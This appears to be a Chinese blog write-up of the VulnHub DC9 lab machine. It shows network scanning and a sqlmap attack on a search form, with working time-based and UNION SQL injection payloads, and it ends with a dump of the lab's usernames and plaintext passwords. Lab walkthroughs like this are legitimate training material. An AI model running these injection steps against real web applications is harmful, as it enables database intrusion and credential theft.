<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-128.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16.png">
  <link rel="mask-icon" href="/images/favicon-128.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhaochoudecat.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="1.探测12345678┌──(root㉿kali)-[~&#x2F;localkali&#x2F;testpayload]└─# arp-scan -l             Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43Starting arp-scan 1.10.0 with 256 hosts (https:">
<meta property="og:type" content="article">
<meta property="og:title" content="DC9">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/05/03/%E9%9D%B6%E6%9C%BA/vulnhub/DC9/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="1.探测12345678┌──(root㉿kali)-[~&#x2F;localkali&#x2F;testpayload]└─# arp-scan -l             Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43Starting arp-scan 1.10.0 with 256 hosts (https:">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110175100.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110180142.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110180103.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110183639.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110183945.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110184446.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110184612.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110184828.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110185038.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110185335.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110190422.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110194213.png">
<meta property="article:published_time" content="2026-05-02T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-02T20:03:51.879Z">
<meta property="article:author" content="zhaochoudecat">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110175100.png">

<link rel="canonical" href="https://zhaochoudecat.github.io/2026/05/03/%E9%9D%B6%E6%9C%BA/vulnhub/DC9/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>DC9 | zhaochoudecat</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zhaochoudecat</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhaochoudecat.github.io/2026/05/03/%E9%9D%B6%E6%9C%BA/vulnhub/DC9/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/saber.jpg">
      <meta itemprop="name" content="zhaochoudecat">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhaochoudecat">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DC9
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2026-05-03 00:00:00 / 修改时间：04:03:51" itemprop="dateCreated datePublished" datetime="2026-05-03T00:00:00+08:00">2026-05-03</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶机</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA/vulnhub/" itemprop="url" rel="index"><span itemprop="name">vulnhub</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="1-探测"><a href="#1-探测" class="headerlink" title="1.探测"></a>1.探测</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# arp-scan -l             </span><br><span class="line">Interface: eth0, <span class="built_in">type</span>: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43</span><br><span class="line">Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)</span><br><span class="line">192.168.3.1     18:d9:8f:c8:68:38       Huawei Device Co., Ltd.</span><br><span class="line">192.168.3.4     00:e0:4c:4d:2a:68       REALTEK SEMICONDUCTOR CORP.</span><br><span class="line">192.168.3.5     b4:2e:99:cc:28:45       GIGA-BYTE TECHNOLOGY CO.,LTD.</span><br><span class="line">192.168.3.45    08:00:27:95:4e:a9       PCS Systemtechnik GmbH</span><br></pre></td></tr></table></figure>

<p><img src="/assets/Pasted%20image%2020260110175100.png"></p>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# nmap -p- 192.168.3.45              </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 17:51 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.3.45</span><br><span class="line">Host is up (0.00072s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT   STATE    SERVICE</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open     http</span><br><span class="line">MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span><br></pre></td></tr></table></figure>
<ul>
<li>注意到22端口被<code>filtered</code>了</li>
</ul>
<h3 id="dirsearch"><a href="#dirsearch" class="headerlink" title="dirsearch"></a>dirsearch</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# dirsearch -u http://192.168.3.45/index.php</span><br><span class="line">/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html</span><br><span class="line">  from pkg_resources import DistributionNotFound, VersionConflict</span><br><span class="line"></span><br><span class="line">  _|. _ _  _  _  _ _|_    v0.4.3</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460</span><br><span class="line"></span><br><span class="line">Output File: /root/localkali/testpayload/reports/http_192.168.3.45/_index.php_26-01-10_17-58-52.txt</span><br><span class="line"></span><br><span class="line">Target: http://192.168.3.45/</span><br><span class="line"></span><br><span class="line">[17:58:52] Starting: index.php/</span><br><span class="line">[17:58:53] 404 -  274B  - /index.php/%2e%2e//google.com</span><br><span class="line"></span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure>
<p>无有用的信息</p>
<hr>
<h2 id="2-sqlmap"><a href="#2-sqlmap" class="headerlink" title="2.sqlmap"></a>2.sqlmap</h2><p>发现search页面，可以输入，推测有注入点<br><img src="/assets/Pasted%20image%2020260110180142.png"><br>注意到post请求，页面url没变，同时burp也有提示post请求，这时有两个方法去测试sqlmap注入<br><img src="/assets/Pasted%20image%2020260110180103.png"></p>
<hr>
<h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# sqlmap -u http://192.168.3.45/results.php --data <span class="string">&quot;search =1&quot;</span> --leve=5 --batch</span><br></pre></td></tr></table></figure>
<ul>
<li>首先<code>url</code>注意是<code>results</code>, 可以看到<code>burp</code>里的<code>post</code>提交路径</li>
<li>因为是<code>post</code>请求，因此需要加上<code>--data</code>，<code>--level=5</code>检查更严格(可以不加)</li>
</ul>
<p>发现<strong>search</strong>注入漏洞</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# sqlmap -u http://192.168.3.45/results.php --data <span class="string">&quot;search=1&quot;</span>  --batch </span><br><span class="line">        ___</span><br><span class="line">       __H__</span><br><span class="line"> ___ ___[,]_____ ___ ___  &#123;1.9.11#stable&#125;</span><br><span class="line">|_ -| . [.]     | .<span class="string">&#x27;| . |</span></span><br><span class="line"><span class="string">|___|_  [&#x27;</span>]_|_|_|__,|  _|</span><br><span class="line">      |_|V...       |_|   https://sqlmap.org</span><br><span class="line"></span><br><span class="line">[!] legal disclaimer: Usage of sqlmap <span class="keyword">for</span> attacking targets without prior mutual consent is illegal. It is the end user<span class="string">&#x27;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[*] starting @ 18:09:40 /2026-01-10/</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[18:09:40] [INFO] testing connection to the target URL</span></span><br><span class="line"><span class="string">[18:09:40] [INFO] testing if the target URL content is stable</span></span><br><span class="line"><span class="string">[18:09:40] [INFO] target URL content is stable</span></span><br><span class="line"><span class="string">[18:09:40] [INFO] testing if POST parameter &#x27;</span>search<span class="string">&#x27; is dynamic</span></span><br><span class="line"><span class="string">[18:09:40] [WARNING] POST parameter &#x27;</span>search<span class="string">&#x27; does not appear to be dynamic</span></span><br><span class="line"><span class="string">[18:09:40] [WARNING] heuristic (basic) test shows that POST parameter &#x27;</span>search<span class="string">&#x27; might not be injectable</span></span><br><span class="line"><span class="string">[18:09:40] [INFO] testing for SQL injection on POST parameter &#x27;</span>search<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:40] [INFO] testing &#x27;</span>AND boolean-based blind - WHERE or HAVING clause<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>Boolean-based blind - Parameter replace (original value)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>PostgreSQL AND error-based - WHERE or HAVING clause<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>Oracle AND error-based - WHERE or HAVING clause (XMLType)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>Generic inline queries<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>PostgreSQL &gt; 8.1 stacked queries (comment)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>Microsoft SQL Server/Sybase stacked queries (comment)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:09:41] [INFO] testing &#x27;</span>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:10:01] [INFO] POST parameter &#x27;</span>search<span class="string">&#x27; appears to be &#x27;</span>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<span class="string">&#x27; injectable </span></span><br><span class="line"><span class="string">it looks like the back-end DBMS is &#x27;</span>MySQL<span class="string">&#x27;. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y</span></span><br><span class="line"><span class="string">for the remaining tests, do you want to include all tests for &#x27;</span>MySQL<span class="string">&#x27; extending provided level (1) and risk (1) values? [Y/n] Y</span></span><br><span class="line"><span class="string">[18:10:01] [INFO] testing &#x27;</span>Generic UNION query (NULL) - 1 to 20 columns<span class="string">&#x27;</span></span><br><span class="line"><span class="string">[18:10:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found</span></span><br><span class="line"><span class="string">[18:10:01] [INFO] target URL appears to be UNION injectable with 6 columns</span></span><br><span class="line"><span class="string">[18:10:01] [INFO] POST parameter &#x27;</span>search<span class="string">&#x27; is &#x27;</span>Generic UNION query (NULL) - 1 to 20 columns<span class="string">&#x27; injectable</span></span><br><span class="line"><span class="string">POST parameter &#x27;</span>search<span class="string">&#x27; is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</span></span><br><span class="line"><span class="string">sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:</span></span><br><span class="line"><span class="string">---</span></span><br><span class="line"><span class="string">Parameter: search (POST)</span></span><br><span class="line"><span class="string">    Type: time-based blind</span></span><br><span class="line"><span class="string">    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</span></span><br><span class="line"><span class="string">    Payload: search=1&#x27;</span> AND (SELECT 6494 FROM (SELECT(SLEEP(5)))FPWe) AND <span class="string">&#x27;ggNh&#x27;</span>=<span class="string">&#x27;ggNh</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Type: UNION query</span></span><br><span class="line"><span class="string">    Title: Generic UNION query (NULL) - 6 columns</span></span><br><span class="line"><span class="string">    Payload: search=1&#x27;</span> UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x44615268716e726b6e4966415575447a42676848597962535a79756e45646241566547736e654f66,0x7170786271),NULL,NULL-- -</span><br><span class="line">---</span><br><span class="line">[18:10:01] [INFO] the back-end DBMS is MySQL</span><br><span class="line">web server operating system: Linux Debian 10 (buster)</span><br><span class="line">web application technology: Apache 2.4.38</span><br><span class="line">back-end DBMS: MySQL &gt;= 5.0.12 (MariaDB fork)</span><br><span class="line">[18:10:01] [INFO] fetched data logged to text files under <span class="string">&#x27;/root/.local/share/sqlmap/output/192.168.3.45&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><p>将<code>burp</code>的抓包直接复制到<code>kali</code>的<code>a.txt</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# cat a.txt </span><br><span class="line">POST /results.php HTTP/1.1</span><br><span class="line">Host: 192.168.3.45</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 8</span><br><span class="line">Origin: http://192.168.3.45</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://192.168.3.45/search.php</span><br><span class="line">Cookie: PHPSESSID=um35hfg1i6v2rdrtie01kp5u2b</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Priority: u=0, i</span><br><span class="line"></span><br><span class="line">search=1</span><br></pre></td></tr></table></figure>

<p>然后用<code>sqlmap -l</code> 指定</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─ sqlmap -l a.txt --batch </span><br><span class="line"><span class="comment">#运行结果上面一致</span></span><br></pre></td></tr></table></figure>


<h3 id="爆破库"><a href="#爆破库" class="headerlink" title="爆破库"></a>爆破库</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─ sqlmap -l a.txt --batch --dbs</span><br><span class="line">[18:15:12] [INFO] fetching database names</span><br><span class="line">available databases [3]:</span><br><span class="line">[*] information_schema</span><br><span class="line">[*] Staff</span><br><span class="line">[*] <span class="built_in">users</span></span><br></pre></td></tr></table></figure>
<p>有两个表<code>Staff</code> 和 <code>users</code>，<code>information_schema</code>是<code>mysql</code>自带的不用管 </p>
<h3 id="查看库中的表"><a href="#查看库中的表" class="headerlink" title="查看库中的表"></a>查看库中的表</h3><p>先看<code>users</code>库，有一个<code>UserDetails</code> 表</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─ sqlmap -l a.txt --batch -D <span class="built_in">users</span> --tables</span><br><span class="line">[18:17:09] [INFO] fetching tables <span class="keyword">for</span> database: <span class="string">&#x27;users&#x27;</span></span><br><span class="line">Database: <span class="built_in">users</span></span><br><span class="line">[1 table]</span><br><span class="line">+-------------+</span><br><span class="line">| UserDetails |</span><br></pre></td></tr></table></figure>

<h3 id="查看表中的字段"><a href="#查看表中的字段" class="headerlink" title="查看表中的字段"></a>查看表中的字段</h3><p>先看下 <code>UserDetails</code>表中的字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─ sqlmap -l a.txt --batch -D <span class="built_in">users</span> -T UserDetails --columns</span><br><span class="line">[18:21:24] [INFO] fetching columns <span class="keyword">for</span> table <span class="string">&#x27;UserDetails&#x27;</span> <span class="keyword">in</span> database <span class="string">&#x27;users&#x27;</span></span><br><span class="line">Database: <span class="built_in">users</span></span><br><span class="line">Table: UserDetails</span><br><span class="line">[6 columns]</span><br><span class="line">+-----------+-----------------+</span><br><span class="line">| Column    | Type            |</span><br><span class="line">+-----------+-----------------+</span><br><span class="line">| firstname | varchar(30)     |</span><br><span class="line">| <span class="built_in">id</span>        | int(6) unsigned |</span><br><span class="line">| lastname  | varchar(30)     |</span><br><span class="line">| password  | varchar(20)     |</span><br><span class="line">| reg_date  | timestamp       |</span><br><span class="line">| username  | varchar(30)     |</span><br><span class="line">+-----------+-----------------+</span><br></pre></td></tr></table></figure>


<h3 id="查看指定字段的数据"><a href="#查看指定字段的数据" class="headerlink" title="查看指定字段的数据"></a>查看指定字段的数据</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─ sqlmap -l a.txt --batch -D <span class="built_in">users</span> -T UserDetails -C <span class="string">&quot;username,password&quot;</span> --dump</span><br><span class="line"></span><br><span class="line">[18:23:53] [INFO] fetching entries of column(s) <span class="string">&#x27;password,username&#x27;</span> <span class="keyword">for</span> table <span class="string">&#x27;UserDetails&#x27;</span> <span class="keyword">in</span> database <span class="string">&#x27;users&#x27;</span></span><br><span class="line">Database: <span class="built_in">users</span></span><br><span class="line">Table: UserDetails</span><br><span class="line">[17 entries]</span><br><span class="line">+-----------+---------------+</span><br><span class="line">| username  | password      |</span><br><span class="line">+-----------+---------------+</span><br><span class="line">| marym     | 3kfs86sfd     |</span><br><span class="line">| julied    | 468sfdfsd2    |</span><br><span class="line">| fredf     | 4sfd87sfd1    |</span><br><span class="line">| barneyr   | RocksOff      |</span><br><span class="line">| tomc      | TC&amp;TheBoyz    |</span><br><span class="line">| jerrym    | B8m#48sd      |</span><br><span class="line">| wilmaf    | Pebbles       |</span><br><span class="line">| bettyr    | BamBam01      |</span><br><span class="line">| chandlerb | UrAG0D!       |</span><br><span class="line">| joeyt     | Passw0rd      |</span><br><span class="line">| rachelg   | yN72#dsd      |</span><br><span class="line">| rossg     | ILoveRachel   |</span><br><span class="line">| monicag   | 3248dsds7s    |</span><br><span class="line">| phoebeb   | smellycats    |</span><br><span class="line">| scoots    | YR3BVxxxw87   |</span><br><span class="line">| janitor   | Ilovepeepee   |</span><br><span class="line">| janitor2  | Hawaii-Five-0 |</span><br><span class="line">+-----------+---------------+</span><br><span class="line"></span><br><span class="line">[18:23:53] [INFO] table <span class="string">&#x27;users.UserDetails&#x27;</span> dumped to CSV file <span class="string">&#x27;/root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv&#x27;</span></span><br><span class="line">[18:23:53] [INFO] you can find results of scanning <span class="keyword">in</span> multiple targets mode inside the CSV file <span class="string">&#x27;/root/.local/share/sqlmap/output/results-01102026_0623pm.csv&#x27;</span></span><br></pre></td></tr></table></figure>

